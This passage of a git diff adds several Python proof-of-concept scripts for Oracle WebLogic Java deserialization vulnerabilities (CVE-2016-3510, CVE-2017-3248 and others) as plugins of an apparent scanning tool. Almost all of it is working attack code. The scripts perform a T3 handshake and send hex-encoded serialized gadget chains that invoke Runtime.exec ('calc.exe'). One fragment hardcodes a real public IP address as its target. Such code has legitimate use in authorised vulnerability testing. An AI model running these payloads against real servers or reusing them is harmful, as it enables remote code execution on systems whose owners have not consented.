951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['weblogic.jms.common.StreamMessageImpl'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '222.85.76.240' + rport = 80 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_3510.py b/plugins/weblogic_poc/CVE_2016_3510.py new file mode 100644 index 0000000..8813f5a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_3510.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-3510'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3248.py b/plugins/weblogic_poc/CVE_2017_3248.py new file mode 100644 index 0000000..c9d5149 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3248.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2017-3248'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['\\$Proxy[0-9]+'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3506.py b/plugins/weblogic_poc/CVE_2017_3506.py new file mode 100644 index 